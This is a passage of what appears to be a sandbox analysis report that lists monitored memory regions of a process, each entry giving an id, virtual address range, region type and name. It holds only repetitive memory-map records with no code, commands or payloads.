"pagefile_0x00000000064e0000" filename = "" Region: id = 2488 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2489 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2490 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2491 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2492 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2493 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2494 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2495 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2496 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2497 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2498 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2499 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2500 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2501 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2502 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2503 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2504 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2505 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2506 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2507 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2508 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2509 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2510 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2511 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2512 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2513 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2514 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2515 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2516 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2517 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2518 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2519 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2520 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2521 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2522 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2523 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2524 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2525 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2526 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2527 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2528 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2529 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2530 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2531 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2532 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2533 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2534 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2535 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2536 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2537 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2538 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2539 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2540 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2541 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2542 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2543 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2544 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2545 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2546 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2547 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2548 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2549 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2550 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2551 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2552 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2553 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2554 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2555 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2556 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2557 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2558 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2559 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2560 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2561 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2562 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2563 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2564 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2565 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2566 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2567 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2568 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2569 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2570 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2571 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2572 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2573 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2574 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2575 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2576 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2577 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2578 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2579 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2580 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2581 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2582 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2583 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2584 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2585 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2586 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2587 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2588 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2589 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2590 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2591 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2592 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2593 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2594 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2595 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2596 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2597 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2598 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2599 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2600 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2601 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2602 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2603 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2604 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2605 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2606 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2607 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2608 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2609 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2610 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2611 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2612 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2613 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2614 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2615 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2616 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2617 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2618 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2619 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2620 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2621 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2622 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2623 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2624 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2625 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2626 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2627 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2628 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2629 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2630 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2631 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2632 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2633 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2634 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2635 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2636 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2637 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2638 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2639 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2640 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2641 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2642 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2643 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2644 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 2645 start_va = 0x64e0000 end_va = 0x64fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 2646 start_va = 0x6500000 end_va = 0x650dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006500000" filename = "" Region: id = 2647 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2648 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2649 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2650 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2651 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2652 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2653 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2654 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2655 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2656 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2657 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2658 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2659 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2660 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2661 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2662 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2663 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2664 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2665 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2666 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 